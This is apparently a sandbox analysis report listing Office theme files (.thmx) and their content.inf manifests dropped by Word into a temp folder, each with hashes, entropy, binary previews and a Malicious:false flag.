                                                                                    Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE665.tmp\Banded.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):562113
                                                                                    Entropy (8bit):7.67409707491542
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                    MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                    SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                    SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                    SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE665.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):278
                                                                                    Entropy (8bit):3.535736910133401
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                    MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                    SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                    SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                    SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE666.tmp\Dividend.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):570901
                                                                                    Entropy (8bit):7.674434888248144
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE666.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):3.5459495297497368
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                    MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                    SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                    SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                    SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE696.tmp\Metropolitan.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):777647
                                                                                    Entropy (8bit):7.689662652914981
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                    MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                    Malicious:false
                                                                                    Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE696.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):290
                                                                                    Entropy (8bit):3.5091498509646044
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                    MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                    SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                    SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                    SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE6C7.tmp\Basis.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):558035
                                                                                    Entropy (8bit):7.696653383430889
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE6C7.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):276
                                                                                    Entropy (8bit):3.5361139545278144
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                    MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                    SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                    SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                    SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE726.tmp\Parcel.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):608122
                                                                                    Entropy (8bit):7.729143855239127
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                    MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                    SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                    SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                    SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                    Malicious:false
                                                                                    Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE726.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):278
                                                                                    Entropy (8bit):3.516359852766808
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                    MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                    SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                    SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                    SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE757.tmp\Frame.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):523048
                                                                                    Entropy (8bit):7.715248170753013
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                    MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                    SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                    SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                    SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE757.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):276
                                                                                    Entropy (8bit):3.5159096381406645
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                    MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                    SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                    SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                    SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE853.tmp\Wood_Type.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1649585
                                                                                    Entropy (8bit):7.875240099125746
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                    MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                    SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                    SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                    SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                    Malicious:false
                                                                                    Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE853.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):284
                                                                                    Entropy (8bit):3.5552837910707304
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                    MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                    SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                    SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                    SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE8C3.tmp\Parallax.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):924687
                                                                                    Entropy (8bit):7.824849396154325
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                    MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                    SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                    SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                    SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                    Malicious:false
